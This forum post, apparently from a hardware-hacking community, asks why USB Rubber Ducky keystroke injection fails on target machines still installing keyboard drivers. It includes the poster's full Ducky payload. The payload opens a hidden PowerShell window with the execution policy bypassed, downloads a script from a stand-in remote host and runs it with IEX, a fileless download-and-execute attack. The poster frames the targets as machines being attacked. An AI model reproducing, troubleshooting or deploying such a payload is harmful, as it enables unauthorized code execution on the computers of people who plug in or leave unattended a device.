Jump to content

Installing drivers on target machines issue


Recommended Posts

Whenever r i plug the ducky into a machine that it has never been attacked before, the HID actions fail because the host is busy trying to find drivers for the ducky to work as a keyboard. I am using the c_duck_v2.1 firmware.

Has anyone got a solution to this problem besides delaying the HID actions for like 10 seconds? Here's my simple ducky payload:

DELAY 1500
GUI r
DELAY 500
STRING powershell -ExecutionPolicy bypass -noprofile -WindowStyle hidden
ENTER
DELAY 500
STRING $wc = New-Object system.net.webclient; $p = $wc.downloadString('https://examplepayloadsite.com/duck.ps1'); IEX $p;
ENTER

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...